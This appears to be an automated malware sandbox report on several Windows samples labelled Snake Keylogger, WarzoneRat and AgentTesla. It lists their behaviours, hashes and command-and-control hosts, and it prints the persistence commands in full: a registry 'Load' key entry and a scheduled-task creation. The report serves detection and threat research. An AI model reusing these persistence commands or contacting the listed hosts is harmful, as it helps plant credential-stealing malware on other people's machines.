| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
"C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe"
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 868
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sslamlssa1.tumblr.com | udp |
| N/A | 74.114.154.22:443 | sslamlssa1.tumblr.com | tcp |
Files
memory/1140-60-0x0000000001090000-0x0000000001091000-memory.dmp
memory/1140-62-0x0000000000900000-0x0000000000901000-memory.dmp
memory/1852-64-0x000000000046B76D-mapping.dmp
memory/1852-63-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/1852-65-0x0000000075D41000-0x0000000075D43000-memory.dmp
memory/1852-66-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/1820-67-0x0000000000000000-mapping.dmp
memory/1820-68-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
117s
Max time network
154s
Command Line
Signatures
Snake Keylogger
WarzoneRat, AveMaria
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\jceDxBmua.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\gnyDKq. = "0" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3236 set thread context of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe |
| PID 2720 set thread context of 1544 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 1768 set thread context of 1648 | N/A | C:\Users\Admin\AppData\Roaming\jceDxBmua.exe | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\jceDxBmua.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
"C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe"
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\jceDxBmua.exe
"C:\Users\Admin\AppData\Roaming\jceDxBmua.exe"
C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe
C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 87.120.37.96:80 | tcp | |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
memory/3236-114-0x00000000000B0000-0x00000000000B1000-memory.dmp
memory/3236-116-0x0000000005020000-0x0000000005021000-memory.dmp
memory/3236-117-0x0000000004B20000-0x0000000004B21000-memory.dmp
memory/3236-118-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
memory/3236-119-0x0000000004B20000-0x000000000501E000-memory.dmp
memory/3236-120-0x0000000006B20000-0x0000000006B78000-memory.dmp
memory/3236-121-0x0000000006C00000-0x0000000006C01000-memory.dmp
memory/3236-126-0x0000000008620000-0x000000000869B000-memory.dmp
memory/3236-127-0x0000000008720000-0x0000000008721000-memory.dmp
memory/3236-128-0x0000000004B20000-0x000000000501E000-memory.dmp
memory/1428-129-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1428-130-0x0000000000405E28-mapping.dmp
memory/1428-131-0x0000000000400000-0x000000000055E000-memory.dmp
memory/3092-132-0x0000000000000000-mapping.dmp
memory/2720-133-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
C:\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/3212-137-0x0000000000000000-mapping.dmp
memory/2720-142-0x0000000005770000-0x0000000005C6E000-memory.dmp
memory/2720-151-0x0000000005770000-0x0000000005C6E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1544-154-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1544-156-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/2476-158-0x0000000000000000-mapping.dmp
memory/2476-159-0x0000000000B20000-0x0000000000B21000-memory.dmp
memory/1544-160-0x0000000004310000-0x000000000444C000-memory.dmp
memory/1768-161-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\jceDxBmua.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Roaming\jceDxBmua.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1768-164-0x00000000004D0000-0x00000000004D1000-memory.dmp
memory/1768-169-0x0000000004D50000-0x000000000524E000-memory.dmp
memory/1768-170-0x00000000080D0000-0x000000000811A000-memory.dmp
memory/1768-175-0x00000000083E0000-0x0000000008452000-memory.dmp
memory/1648-176-0x0000000000400000-0x0000000000426000-memory.dmp
memory/1648-177-0x000000000042010E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\jceDxBmua.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jceDxBmua.exe.log
| MD5 | 9e7845217df4a635ec4341c3d52ed685 |
| SHA1 | d65cb39d37392975b038ce503a585adadb805da5 |
| SHA256 | d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b |
| SHA512 | 307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1 |
memory/1648-184-0x00000000057E0000-0x00000000057E1000-memory.dmp
memory/1648-185-0x0000000001860000-0x0000000001861000-memory.dmp
memory/1648-187-0x0000000006A00000-0x0000000006A01000-memory.dmp
memory/1648-189-0x0000000006F80000-0x0000000006F81000-memory.dmp
memory/1544-190-0x0000000004C10000-0x0000000004C94000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
Analysis: behavioral10
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
109s
Max time network
35s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\kprUEGC = "C:\\Users\\Admin\\AppData\\Roaming\\kprUEGC\\kprUEGC.exe" | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1844 set thread context of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qqUYUQOSj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5199.tmp"
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 87.120.37.96:80 | tcp | |
| N/A | 91.92.109.175:80 | tcp |
Files
memory/1844-60-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/1844-62-0x0000000000580000-0x0000000000581000-memory.dmp
memory/1844-63-0x0000000000530000-0x000000000054B000-memory.dmp
memory/1844-64-0x0000000005080000-0x0000000005100000-memory.dmp
memory/1844-65-0x0000000000770000-0x00000000007AC000-memory.dmp
memory/664-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp5199.tmp
| MD5 | 31c2f502d8b37cb5681c558270502714 |
| SHA1 | 81d4b7f27d75e97ff52d8f1b0a6049970cf519a9 |
| SHA256 | 2f5ae3230accaca945c141a0599ed32b4fe97231356f4ab2d344c49822fd06d5 |
| SHA512 | d4d9d11f4080e7bf3868eafb7562e3b1364672683297aed0ca6e94114471248b49942c79608591a16f83d94bcada03426fb8066fd9215884897714ec9f14d6f5 |
memory/1028-68-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1028-69-0x000000000043763E-mapping.dmp
memory/1028-70-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1028-72-0x00000000005F0000-0x00000000005F1000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
